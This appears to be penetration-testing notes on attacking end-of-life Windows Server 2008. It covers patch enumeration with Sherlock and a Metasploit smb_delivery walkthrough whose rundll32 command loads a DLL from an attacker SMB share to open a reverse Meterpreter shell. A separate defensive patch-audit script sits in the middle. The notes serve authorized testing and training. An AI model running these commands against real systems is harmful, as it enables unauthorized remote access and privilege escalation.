Windows Server 2008/2008 R2 reached end-of-life on January 14, 2020.
Penetration testers need to understand the client's core business and hold discussions during the assessment, especially when dealing with scanning/enumeration and attacking legacy systems, and during the reporting phase.
Exploiting Windows Server 2008
For an older OS like Windows Server 2008, we can use an enumeration script like Sherlock to look for missing patches. We can also use something like Windows-Exploit-Suggester, which takes the results of the systeminfo command as an input, and compares the patch level of the host against the Microsoft vulnerability database to detect potential missing patches on the target. If an exploit exists in the Metasploit framework for the given missing patch, the tool will suggest it.
Method:
Querying Current Patch Level
wmic qfe
Running Sherlock
Set-ExecutionPolicy bypass -Scope process
Import-Module .\Sherlock.ps1
Find-AllVulns
This lists the CVEs and the status of each (vulnerable or not).
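The patch-level comparison described above (hotfixes reported by systeminfo or wmic qfe checked against a list of required updates), written as a patch-gap audit. This is an added example, not code from Sherlock or Windows-Exploit-Suggester; the baseline, the KB numbers and the sample output are constructed placeholders, and treating a superseding update as satisfying an advisory is an assumption of this sketch.

```python
import re

# Constructed baseline: advisory label -> KBs that remediate it (the original
# update or any superseding one). The KB numbers are placeholders, not real IDs.
BASELINE = {
    "2010-3338": {"KB0000001", "KB0000002"},
    "EXAMPLE-ADVISORY-B": {"KB0000003"},
}

# Constructed systeminfo excerpt.
SAMPLE_SYSTEMINFO = """\
Host Name:                 LEGACY01
OS Name:                   Microsoft Windows Server 2008 R2 Standard
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB0000002
                           [02]: KB0000009
Network Card(s):           1 NIC(s) Installed.
                           [01]: Example Adapter
"""

KB_RE = re.compile(r"\bKB\d+\b", re.IGNORECASE)


def installed_hotfixes(text):
    """Return KB IDs from systeminfo output, or from `wmic qfe` as a fallback."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if line.lower().startswith("hotfix(s):"):
            found = set()
            # Entries are the indented "[nn]: KBxxxx" lines under the header.
            for entry in lines[i + 1:]:
                if not entry.startswith(" "):
                    break
                found.update(kb.upper() for kb in KB_RE.findall(entry))
            return found
    # No systeminfo header: treat the text as `wmic qfe` and scan every line.
    return {kb.upper() for kb in KB_RE.findall(text)}


def missing_updates(text, baseline=BASELINE):
    """Return the advisory labels for which no remediating KB is installed."""
    have = installed_hotfixes(text)
    return sorted(label for label, kbs in baseline.items() if not (kbs & have))


if __name__ == "__main__":
    for label in missing_updates(SAMPLE_SYSTEMINFO):
        print("missing update for", label)
```

A host that reports "Hotfix(s): N/A" yields an empty set, so every baseline entry is reported as missing.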
Obtaining a Meterpreter Shell
One easy way is to use the smb_delivery module, as Server 2008 is vulnerable to this.
msf> search smb_delivery
msf> set target 0 -> set target to DLL
Only set the LHOST parameter, not SRVHOST.
msf> exploit
This provides an exploit payload: rundll32.exe \\10.10.14.6\lEUZam\test.dll,0
Run command on target
rundll32.exe \\10.10.14.6\lEUZam\test.dll,0
Receive a reverse shell
Meterpreter session opened
Background the Meterpreter shell
Searching for Local Privilege Escalation Exploit
Now, based on the Sherlock results, we can search for 2010-3338 (Task Scheduler XML privesc).